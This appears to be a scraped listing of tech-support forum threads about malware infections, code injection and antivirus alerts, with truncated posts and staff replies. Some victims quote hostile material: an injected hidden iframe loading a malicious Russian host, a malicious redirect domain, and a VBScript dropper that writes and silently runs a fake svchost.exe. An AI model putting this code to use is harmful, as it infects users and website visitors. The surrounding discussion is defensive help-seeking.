About an hour ago I did an error check on my C drive. I had to restart my computer to do it and after it was done and I had logged back in Comodo Defense had blocked the application explorer.exe. I wasn't browsing the internet in FireFox yet. It said "this is typical of a buffer overflow attack". It said it isolated explorer.exe from the rest of the system and will continue to do so unless I skip the alert but it is strongly recommended that I close the application and contact its vendor for a fix. So, I hit terminate and here I am.

Now what? Nothing happened when I hit terminate. Under defense events it says the application is C:\windows\SysWOW64\explorer.exe and the flag is Shellcode Injection. Like I said, it didn't alert me until an hour ago but under defense events it's listed as also happening at 11:43 last night. I believe windows ran something last night, can't remember what. I think it was a Windows virus scan or something, it wasn't Comodo that ran it.

I am currently running Comodo virus scan to see if anything is in there, but so far nothing. What's a vendor and how do I contact them to fix explorer.exe? Is this something to be concerned about? I'm decent with computers but I don't know a lot, so please keep that in mind.

A:Shellcode Injection

Try resetting IE to its defaults first. Tools > Internet Options > Advanced > Reset button. Are you running IE8 or IE9?

3 more replies
Answer Match 42%

On one of the sites I order from, when I try to access the status page for my orders, I get the above warning from my free AVG 8.5 edition. Yet, when I scan my computer, nothing turns up. How do I get rid of the above warning so I can access the page referred to? Thanks
I have Windows XP Media Center Edition Version 2002 Service Pack 3
 

A:exploit script injection-358

7 more replies
Answer Match 42%

Hello,

A couple websites which I work with has been hit with this:

<iframe src="http://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe;>

After consulting a website specific to helping out with those types of problems, they told me to get my computer checked here.

I have done two malware & virus scans along with a Hijack This log...all below.

I am VERY frustrated and would like to get this over with.

Thanks,
DN

---

Malwarebytes' Anti-Malware 1.38
Database version: 2413
Windows 5.1.2600 Service Pack 3
7/12/2009 10:35:08 PM
mbam-log-2009-07-12 (22-35-08).txt
Scan type: Full Scan (C:\|D:\|F:\|)
Objects scanned: 296131
Time elapsed: 56 minute(s), 39 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0
Memory Processes Infected: (No malicious items detected)
Memory Modules Infected: (No malicious items detected)
Registry Keys Infected: (No malicious items detected)
Registry Values Infected: (No malicious items detected)
Registry Data Items Infected: (No malicious items detected)
Folders Infected: (No malicious items detected)
Files Infected: (No malicious items detected)

---

KASPERSKY ONLINE SCANNER 7.0 REPORT
C:\Documents and Settings\Derek\Local Settings\Temp\~TM30.tmp Infected: Backdoor.Win32.Zdoogu.em 1
C:\Documents and Settings\Derek\Local Settings&#... Read more

A:Trojan/Maybe SLQ Injection - Logs

Hello #41baby and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the resu... Read more

2 more replies
Answer Match 42%

Thwarting SQL Injection Threats.

New Dark Reading report explores what database developers and database administrators can do about the pervasive SQL injection attack

Note: This article is targeted to SQL application developers and administrators - makes for interesting reading since virtually all browsers use MySQL internally, and SQL injection attacks can affect us all.

-- Tom
 

More replies
Answer Match 42%

Last week, I do not remember the day exactly but I believe on 2/2/2016 I downloaded and installed a free screen recording application called CamStudio. It seemed legit but it asked to install a bunch of other stuff which I declined, then went ahead and installed a bunch of other stuff anyway. This affected all the browsers on my computer (Chrome, IE, and Firefox), changing the search to "Bing" or something that looked like Bing, and installed some other programs that I noticed.

I tried removing all of it and everything seemed fine until I was notified today by a user of a website that I maintain (hosted at GoDaddy) that the site looked strange. Sure enough it is completely messed up. I have not uploaded any new files to the site in the last week but when I look at the source code for the index page I see strange links to javascripts that are not supposed to be present, and redirects appended to links on the page.

The two scripts I notice immediately are "us.clickscart.in" and "us.browserupdatecheck.in". I have attached a screenshot.

To conclude, my issue appears to be similar to this user's: My Help Thread: Get Rid Of Javascript Injection

Before I came across this forum I read on some other sites and ran an AdwCleaner scan and clean, but did not keep the log file it may have created. From this point I will follow only the instructions given me in this thread.

Yes, I do have access to the original Windows 7 install disk. I also... Read more

More replies
Answer Match 42%

I use Kaspersky Internet Security 2010. They claim that all third party programs interfere with its detection somehow. I have Malwarebytes' Anti-Malware on my HP and ran it yesterday. It found a little over 7 pieces of malware that Kaspersky never blocked. Only one was in my Temporary Internet Files folder. All the other ones were scattered across my user account (administrator). Is this product worth keeping if it lets Trojan Downloaders and other junk in like that? Malwarebytes did find 3 Trojan Downloaders, I think it also found a couple of Spyware files too. Malwarebytes didn't find any infections today. Whether there are more on the machine that it doesn't have a signature for I don't know...

Has anybody who is using KIS 2010 had this problem? I have KIS to run a Quick Scan and Update every hour so I know that it's updating.

Does anyone know of any other internet security product that has good detection, and is either strong or sturdy?

A:Malware Injection Surprise

Hello,

Your predicament sounds all too familiar. When I bought my Dell computer, it came free with McAfee. It blocked an average of two infections a month. My licence then expired, and I got Kaspersky, because there was a special offer, and I could get it free. My internet usage did not change, but in two years it blocked three infections, and it found another three on the system. Very unimpressive results, but I continued to use it.

I then caught some very nasty malware indeed, and after that I decided to switch. I switched to MSE and have been infinitely happier. I never liked the user interface of Kaspersky, and hated the Firewall enough to switch back to the Windows one. I urge you to try MSE at some point, even if you switch back.

If you still believe you are infected, tell us. I am currently taking a degree in Malware Removal, so I cannot help you, but there are other members who can.

Rant over!

Richard

9 more replies
Answer Match 42%

Hello, so about a month or two ago I removed a real nasty rootkit I got from a torrent (silly me, trusted downloaders only!).
Anyways, all has been fine, no issues, I'm very anal about keeping my computer clean.
Today however, I was browsing facebook, and my entire computer froze. I hit the hard reset button on the outside of my case, which did nothing for about 15 seconds and then my computer shut off instantly. No reboot, either. Thinking, hmm, this is suspicious, maybe it's a hardware problem -- I went to my event viewer, and I found nothing hardware related, no errors, warnings, or critical messages other than the unexpected shutdown, and this little puppy.
Warning - Event ID 11 - Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
 

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Wininit" Guid="{206F6DEA-D3C5-4D10-BC72-989F03C8B84B}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x4000000000000000</Keywords>
<TimeCreated SystemTime="2015-03-28T18:46:33.452427800Z" />
<EventRecordID>368427</EventRecordID>
<Correlation />
<Execution ProcessID="788" ThreadID="820" /... Read more

More replies
Answer Match 42%

Anatomy of a SQL Injection Attack.

"SQL injection has become perhaps the most widely used technique for compromising Web applications, thanks to both its relative simplicity and high success rate. It's not often that outsiders get a look at the way these attacks work, but a well-known researcher is providing just that. Rafal Los showed a skeptical group of executives just how quickly he could compromise one of their sites using SQL injection, and in the process found that the site had already been hacked and was serving the Zeus Trojan to visitors."

Los's original blog post has more and better illustrations.

-- Tom
 

A:Anatomy of a SQL Injection Attack

Yikes, I'd hate to be the guy responsible for coding that site when the CEO left that conference.
 

1 more replies
Answer Match 42%

Is there any conflicts or protection with/for Low Level Code Injection into processes? Also, turning off DEP is the same as it was on vista correct?

Thanks, Dante

A:Low-Level Code Injection

Why are you turning off DEP? Only turn DEP off on applications that do not support it! But leave it on, seriously.

2 more replies
Answer Match 42%

Hi,
I have a friend at work in security. He mentioned something about sql injection and said
I should check my site to see if it is vulnerable to that.

Is there any way I can test my site for that? Also what's some of the other things a person
can do to make sure their site is secure from being hacked into?

Thanks. Dan
 

A:Is there a way to test my website against sql injection?

14 more replies
Answer Match 42%

My problem is the way one of my sites worked after I downloaded a file I did not want to. The file was off of 4shared(website) was not the right file and installed many programs to my computer. I got rid of those programs with "Programs and Features" in the "Control Panel" as well as "Revo Uninstaller" to get rid of those that would not delete. I thought things would work properly... I did several scans with Vipre(my antivirus) and when it wanted me to restart my computer, I did. After the restart, my homescreen background was fixed around which I did not know why. Then from there, I made sure things were "ok" again and I did another Vipre scan as well as a Windows Defender scan. I checked my browser (Firefox) and Audiotool(website) which I usually use all the time, did not seem to be working right. I tried different browsers but it just would not seem to load from link to link. The app in the site would not work as well. My only concern is the audiotool website. I don't know if that bad file put other bad things in my computer, but I really quite want this site to work for me. My flash player is fine and I also tried clearing Cache as well as site cookies. I did research and found out that the file may have been a Javascript Injection. When I looked at the source information for the site, I found one in there.
I only found one person online with the same exact problem as mine with the injection, but they never had it fixed. I cannot gi... Read more

A:My Help Thread: Get Rid Of Javascript Injection

Hello and Welcome to TSF,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download to and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My native language is not engli... Read more

8 more replies
Answer Match 42%

how to inject javaScript in as3.
any ideas???

 

More replies
Answer Match 42%

OK, I visited this site on Google using cache and when I visited it my AVG 8.0 Web Shield popped up saying that the file is infected. I went to the web shield page and here is what it looks like: What is this and am I safe? I scanned my computer and no virus was found. Please help, anything.

A:Exploit Script Injection 358

OK after running AVG 2 times, I noticed something weird. Look at the total objects tested...it is LOW compared to previous scans I did. Help?????

5 more replies
Answer Match 42%

OK, I visited this site on Google using cache and when I visited it my AVG 8.0 Web Shield popped up saying that the file is infected. I went to the web shield page and here is what it looks like:

What is this and am I safe? I scanned my computer and no virus was found. Please help, anything.
 

A:Exploit Script Injection 358

OK after running AVG 2 times, I noticed something weird. Look at the total objects tested...it is LOW compared to previous scans I did.

Help?????
 

2 more replies
Answer Match 42%

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide. ...

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014) ...

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser's type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system ...

f-secure.com/weblog

A:Javascript Injection Attack

Oh great, more ways to get infected.....

4 more replies
Answer Match 41.58%

Hi, I don't know if any of you remember me or not (probably not and that's okay because let's face it - there's a ton of us in this group & none of us should expect to be THAT important - right?)

Anyway, in 2008 my windows xp/laptop was infected with a malware/adware scam. The short of it is that it turned out to be a SOAP bug (I just found that out today by searching through my system's files). At first when I posted on this site I was given the instructions how to (at least) keep the computer from doing its shutdown process on me as this bug comes with an automatic system shutdown timer set for 60 seconds at startup. Some kind soul in this group gave me a command to enter in at the command prompt "shutdown -a" which is what I've been using since June of 2008 (roughly). So today I stumbled across the actual bug's program. I am pasting it into this post just below here so that (hopefully) someone within the group can tell me how to fix my problem without completely doing a system reset. I have an Acer Extensa 4620Z laptop & the Acer system comes with a system backup/restore within it that will completely reset the system back to when it was first purchased but I will lose everything (it's like having the memory wiped out). I really don't want to do that (duh) but right now I can't burn discs, download software from cd drive, download software from the net, install any software period as it says my sql is... Read more

More replies
Answer Match 41.58%

My daughter was playing a cd-rom yesterday and all of a sudden the mouse stopped working. I tried a different mouse and it didn't work. I got a message a little while later from Comodo that there was a possible shellcode injection. Never heard of this. At the moment I am running Spybot on the computer (using a neighbor's computer). Thank you so much for all of your help in advance!!!

Megan

PS If you could send a link to a site that has keyboard shortcuts with good, simple explanations, that would also help a bunch. I am pretty proficient on the computer but I don't know most of the technical names for stuff.
 

A:help! mouse not working/ possible shellcode injection

I have no idea if these are even connected. I have updated the driver for the mouse, device mgr says it is working fine. Spybot has not found anything. Thanks again!
 

2 more replies
Answer Match 41.58%

One of my clients got hit with some malware yesterday. I picked up the box, cleaned it and took it back this morning. When I hooked it back up the browser came up with Antivirusxp links and spam at the top of the web page, kind of an overlay to whatever web page it's on. Thinking I missed something on my manual clean I ran combofix and several malware progs and nothing. Next step was hijackthis and process explorer. Again nada. Loaded firefox and it's there also. Any suggestions? It's looking to me like I missed a rootkit.

TIA
Bromaz

A:Antivirusxp Browser Injection/Overlay - Help

Doing my own followup... Could not find the source of the overlay and customer ended up reloading the PC. This is the first in years I have been unable to nail.

Bfromaz

1 more replies
Answer Match 41.58%

I'm having an issue with getting Windows PE 3.0 to recognize hard drive. At least I think this is the problem. I'm attempting to boot a Dell Latitude E7470 Solid State Drive, Windows 7 64-bit machine from a WINPE3.0 USB thumb drive. Initially, before I dug into injecting drivers, I would plug in USB and boot from USB and the Windows PE grey splash screen would show and attempt to load system files and then it would fail and restart and load Windows partition normally.

I try to boot from WINPE again and I press f8 quickly to access a command prompt, and run diskpart to see what drives are being detected. It turns out that WINPE3.0 is not detecting my solid state drive.

I then search out the right drivers for this model and I find out that I need these two: Picture: https://sli.mg/5pV7nu

I run 7zip to extract out these files/folders and then I run DISM to mount my boot.wim (from WinPE) and run the DISM command to inject the drivers into the unmounted .wim file.

I try two different ways of injecting drivers:

1) The first way is I use the DISM command to add in the drivers with the recurse switch option. I put all driver files above in one folder and run recurse. Picture: https://sli.mg/H9InCw

This inject works and takes a few minutes. I then unmount and commit and copy over my newly injected WINPE package and copy it over to my USB and attempt to boot and it gives me an error pointing to a .sys file. I tried deleting the .sys file but I realize that this won't work because the .sys is... Read more

More replies
Answer Match 41.58%

Tech Insight: SQL Injection Demystified.

Attackers are using the old standby SQL injection en masse -- a look at the attack and how to protect your applications from it

-- Tom
 

A:Tech Insight: SQL Injection Demystified

Dear Tom,
My thanks will keep pouring in for various reasons! Off-topic, I have bought two books dealing with Linux flavors-->Mandriva and Xandros! A senior member said MSlos is much easier for an absolute novice in Linux, like me! Kindly give your opinion, please! I had a bad trip with UBUNTU (hope you remember--I expect you not to, because you deal with so many guys like me!)!
 

3 more replies
Answer Match 41.58%

Does anyone know if there is a version of this out there that still works or has Microsoft already fixed this problem, because if they haven't could you provide a download link. I need this so that I can have administrative ability in cmd to be able to use C:\Windows|System32>mkdir testl.

More replies
Answer Match 41.58%

Several weeks ago, I asked a question in my profile status:




Could a malware running inside the sandbox attack the memory of a process running out of the sandbox?

The link to that status: Online_Sword

Here are some (not all) replies to that profile status:

@Klipsh




Of course, sandbox evasion is not a myth.

@hjlbx




This is how some CVEs work. So possible, yes. Somewhere in OS and all other softs there lies undiscovered vulnerabilities of all types. COMODO functionality address this sort of thing, but technical infos hard to come by...

@DracusNarcrym




Ah, I see. In that case it would be preferred that the sandbox terminate any executable that attempts to perform operations such as injecting code in running process images - since the whole "clone process" deal is not possible.

In my own reply to that profile status, I said that I would do some tests by myself. However, at that time I only had some malware samples which inject the memory of other processes with the technique called "Process Hollowing". By contrast, I hope to do some tests with malware samples that directly inject into other processes instead of using the technique "Process Hollowing". Following is an introduction of "Process Hollowing" written by @itman (thanks) in wilderssecurity:




"Classic" process hollowing takes the form of the... Read more

A:Memory Injection Inside Sandbox

Your tests so far certainly confirm our suspicions that using code injection, from within the sandbox, in non-sandboxed memory images, is not feasible.

At least the two outlined techniques failed.

Perhaps there are other methods, maybe not as effective/advanced, but "primitive" enough for sandbox software to overlook them.
 

1 more replies
Answer Match 41.58%

Hello everyone,
I'm Pablo from Brazil and I got my PC very very low to use a few days ago, and today unfortunately I got infected by a template that I downloaded on the internet.

DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

I found a topic in this forum from 2010 (http://www.bleepingcomputer.com/forums/t/335436/svchostexe-script-injection-into-local-html-files/) and I already did the first steps (Combofix as comfix and already run), here's the log.


A:svchost.exe script injection html

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.
CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/554800 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies
Answer Match 41.58%

Hello Bleeping Computer
I'm currently trying to fight against this spambots on my computers / internet.
We have currently three computers running on the same IP that is getting blacklisted. I did a MBAM scan today and I thought it would help, seems like not, for 7 hours ago CBL got reports about another spam from my IP. 
On this computer I'm making this thread on had 0 virus, but the two others had 82 and 89.
I will start out with my main computer.
- FRST LOG -

More replies
Answer Match 41.58%

Anti-code injection framework.

A new company, Recursion Ventures, has been formed by Dan Kaminsky, Michael Tiffany and Henry Bar-Levav to take a fresh approach to computer security. Recursion Ventures' Interpolique framework is aimed at helping developers make their web applications immune to SQL injection and cross-site scripting attacks. The basic idea is to transform data entered by the user into Base64 so that, even where it's constructed incorrectly with additional code, it's unable to cause any damage.

-- Tom
 

A:Anti-code injection framework

 

1 more replies
Answer Match 41.16%

I keep getting this Altnet thing coming up on my Spybot and AdAware. Here's my Hijack This log:


A:Altnet is visiting me again

12 more replies
Answer Match 41.16%

I need some help--I believe my 12 year old son is visiting inappropriate websites while we are at work. At the end of the night I clean out the temporary internet folder to free up space on the computer, and last night I was just scanning the folder and found all kinds of porn websites!! So I cleaned it out, and when I logged on this evening the sites he normally visits were there but so were other porn sites.

Tell me if I'm wrong, but is it true that every website you visit is recorded in the temp internet folder? and so popups get space there and when those cookies automatically go there is the computer is just left on which is what he is trying to tell me.

So is there another way to find out a list of websites that have been visited.

I really need to get these questions asked.

Thanks
 

A:HELP-son maybe visiting XXX sites

15 more replies
Answer Match 41.16%

There is a rare problem in the Sims that seems only to affect my computer. The thread has 40-some views, but no replies, and I posted more than a week ago. Please help me!

Click on the text to go to the forum

Please help,
rothn
 

A:Nobody is visiting my forum

It means that no one has an answer! I know its unfortunate, but it does happen I am afraid
 

2 more replies
Answer Match 41.16%

Hey guys, I wanted to share this with you and hear your suggestions/opinions about this:

"In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine...."
Shellcode - Wikipedia, the free encyclopedia

Cracker's Choice

"....Buffer overflow has become one of the preferred attack methods for writers of viruses and Trojan horse programs....
QuickStudy: Buffer Overflow
On Windows Server 2008/Vista computers, it reduces the protection level of the computer, as it modifies the level of the Mandatory Integrity Control (MIC), leaving it low..."

Scanned with Avast, didn't find a thing, Malwarebytes results were (scanned and with a-squared after malwarebytes, nothing):

Trojan.Hiloti
Date spotted:
First seen on 2008-12-25.
Last seen on 2010-02-26.

Detection statistics:
This object is 0.05% of all objects detected.
1,403,342 instances detected worldwide.
Malwarebytes.org
Hiloti is a Trojan which downloads to the affected computer the adware detected as Lop.
Additionally, when users access through the Firefox browser certain websites related to search engines, they are redirected to malicious websites from which more malware will be downloaded.
What is Trojan Hiloti. Encyclopedia. Panda Security

Now, can that trojan be somehow connected with this buffer overflo... Read more

A:shellcode injection - buffer overflow atack

does your pc get back to a healthy state? or it still haunted with that hiloti?

3 more replies
Answer Match 41.16%

I need help from techies as I’m facing a strange issue where my browser redirects everytime to a malicious ad/website.
http://imgur.com/vqoBOP9
the browser opens a new page redirecting to hxxttp://hidcptqmerifcusymaqddcomolsujibeptsmycmqsrwgrcmywshgnfpjhcc.com/rot.aspx?partner=910345&f=popup-u
and then this redirects to some page on tradeexchange.com, buysellads.com etc
I will be glad if some techie can help me solve my problem. Adw Cleaner, MB Junkware Removal Tool couldn’t find anything neither did windows defender and MSE. Only KIS detects and blocks it but I need to get rid of this. Formatted my laptop since this problem was there earlier but still it is coming even after complete format. Please help me.

 
Please find this is my problem. It has a JS injection whenever I click anywhere on any website this site opens up which is blocked by my AV. There is some script hidden in my system somewhere which I'm not able to remove.
 
Please find attached my FST scan and ADWCleaner scan log in the post.
 
 

A:Need to remove JS injection Trojan virus permanently

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.
If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).
The scan may take some time to finish, so please be patient.
If potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.
While still on the Scan tab, click the link for View detailed log, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
The log is automatically saved by MBAM and can also be viewed by clicking the History tab and then selecting Application Log... Read more

8 more replies
Answer Match 41.16%

Last week my Windows XP Home edition was infected with the "System Tools" malware. I ran malware bytes and Glary utilities and everything seemed ok. A few days later a couple of my servers were accessed via FTP (I guess my ftp info was stolen during the malware event). Many of my server files were injected with a line of code. My hosting company HostGator removed the injections and suggested that I run malwarebytes again as well as ComboFix. I just ran both but now see that a pair of expert eyes needs to look at the output log generated by ComboFix.

Is there anyone available to take a look?

If so, let me know if I should post it here or send via PM.

Thanks.

A:Help with ComboFix report after Malware injection on my Server

Hello,
Please follow the instructions in ==>This Guide<== starting at step 6.
Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<==
Since you have run ComboFix, please include the ComboFix log in the new topic. Please be sure to include a description of your computer issues and what you have done to try to resolve them.
If you cannot produce any of the other logs, then please create the new topic anyway, include the information that you were unable to produce the other logs and why and include the ComboFix log along with a description of your computer issues.
Orange Blossom

2 more replies
Answer Match 41.16%

I got infected by a trojan (I think) through downloading keygen. This disabled all my internet activities. I cannot go online at all.

Please see my log. Thanks for help in advance.



A:Trojan injection disabling connection to internet. Please help!!!

Hello, and welcome to TSF.

I am currently reviewing your log. I will be back with a fix for your problem as soon as possible.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.

13 more replies
Answer Match 41.16%

Multiple Browser Injection Vulnerabilities (Secunia)

In personally testing this, ALL 3 BROWSERS FAILED THE TEST (e.g., IE 6 SP1, Mozilla Firefox 1.0, and Opera 7.60 Beta). Hopefully all the vendors are working on this one, as the opportunities for phishing expeditions are certainly possible with this one.

BROWSER IMPACTED: Netscape 7.x, Konqueror 3.x, Opera 7.x, Safari 1.x, Microsoft Internet Explorer 5.01/5.5/6, Mozilla 0.x, Mozilla 1.0, Mozilla 1.1, Mozilla 1.2, Mozilla 1.3, Mozilla 1.4, Mozilla 1.5, Mozilla 1.6, Mozilla 1.7.x, Mozilla Firefox 0.x, Mozilla Firefox 1.x

The problem is that a website can inject content into another site's window if the target name of the window is known. This can e.g. be exploited by a malicious website to spoof the content of a pop-up window opened on a trusted website.

Solution: Do not browse untrusted sites while browsing trusted sites.

RELATED PRODUCT SITES
Netscape: http://secunia.com/advisories/13402/
Opera: http://secunia.com/advisories/13253/
Mozilla: http://secunia.com/advisories/13129/
IE: http://secunia.com/advisories/13251/
Konqueror: http://secunia.com/advisories/13254/
Safari: http://secunia.com/advisories/13252/

Secunia has constructed a test, which can be used to check if your browser is affected by this issue:
http://secunia.com/multiple_browsers_windo...erability_test/

A:Multiple Browser Injection Vulnerabilities (Secunia)

Firefox is indeed vulnerable, but I thought this was great.

3 more replies
Answer Match 41.16%

Quote:
One of the more bizarre architectural elements of HTML that may still be excused with the phrase, "This behavior is by design," is the ability for a floating text frame using the <IFRAME> element to be rendered effectively invisible (or so miniature as to not be seen), and then to run JavaScript code. It's a trigger for a disaster; and pressing that trigger tens of thousands of times today is a particularly virulent SQL injection attack, the evidence of which can be detected through a simple Google search: Wednesday afternoon, Betanews discovered about 82,800 compromised pages appearing in Google's index just for one of the actual malicious triggers...




A:Latest SQL injection quickly spreads malicious JS

Thanks Aaron, hope it doesn't happen on my site.

1 more replies
Answer Match 41.16%

Recently, my upload speed and general computer speed has been quite low. Until today, I have not received any notifications from Avast. It is a different .exe each time I get the avast message.

Basically,
The virus is classified as Win32:Clicker-F [Trj] and it is in my temp folder.
Each time I get the virus alert, it is a different file.
The file is ctv1*****.exe - The * represent different numbers every time.
The virus is classified as a trojan.

EDIT: I removed a few processes in my process list that have been known to have virus issues. One in particular was called 0.232324445.exe (Not exactly the same, but numbers like that), I figured that just screamed bad, I google'd it, found nothing, so I delete it, it appeared to have stopped, for now at least. I will update this as I go along. If theres any other important things I should know, please post them. Thanks.

EDIT 2: After checking, my upload speed, for files as small as 1mb, is still very slow. I checked on speedtest, and my internet speed is where it should be. I don't know why it is still so slow, maybe the virus is still here?

Here is my HiJackThis log.

A:Continued virus injection? HiJackThis log inside

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process. Please also continue to work with me until I give you the all clear. Even if your computer appears to act better, you may still be infected.

Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.

Once we start working together, please reply back within 3 days or this thread may be closed so we can help others who are waiting.

We need to create an OTL report,
Please download OT... Read more

2 more replies
Answer Match 41.16%

JavaScript Injection Attack.

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

IE (through ActiveX loopholes), and Firefox 1 and 2 are vulnerable to these attacks (read the article).

I suggest using Firefox 3 (latest is 3.0.1, soon to be 3.1) with the NoScript add-on to control what JavaScript you allow to execute on your computer.

-- Tom
 

More replies
Answer Match 40.74%

Hello wise ones,

I often have guests staying w/ me from around the world that I know little about other than intuition, what is on their profile and written references from other hosts. Through www.couchsurfing.com

I am very concerned letting them use my PC as they may download a virus or install a key logger. (Kaspersky is installed and shows up under the guest identity on XP. But I think perhaps they could turn it off and bypass it?)

What would be the best way to allow them computer access?

1. Get an old PC for them to use? (if they are on my router can they access my other PC's personal information? If so how do I limit them from accessing my PC info?)

2. Install a software program like used at an Internet Cafe?

Any other ideas?

Kind Thanks!
 

A:Best PC Security with Visiting Guests?

8 more replies
Answer Match 40.74%

My company has 2 offices that operate totally independent of each other. Each has their own domain. I have a VP that is usually in office B. Part of the time he is in Office A. His computer is part of office B domain and when he is in office A needs to use those printers and data on office A servers. How do I get that to work? He has Windows 10 Pro on his laptop.
 

More replies
Answer Match 40.74%

My sister in law is in town and I hooked her up to our router. At home she uses timewarner roadrunner as her ISP. Her Outlook is not sending mail while connected through my wireless. Nothing should have changed in her outgoing mail provider, at least that I know of, so why would connecting to my wireless mean she gets a failure to send in outlook? Any thoughts?
 

A:relative visiting and using wireless

16 more replies
Answer Match 40.74%

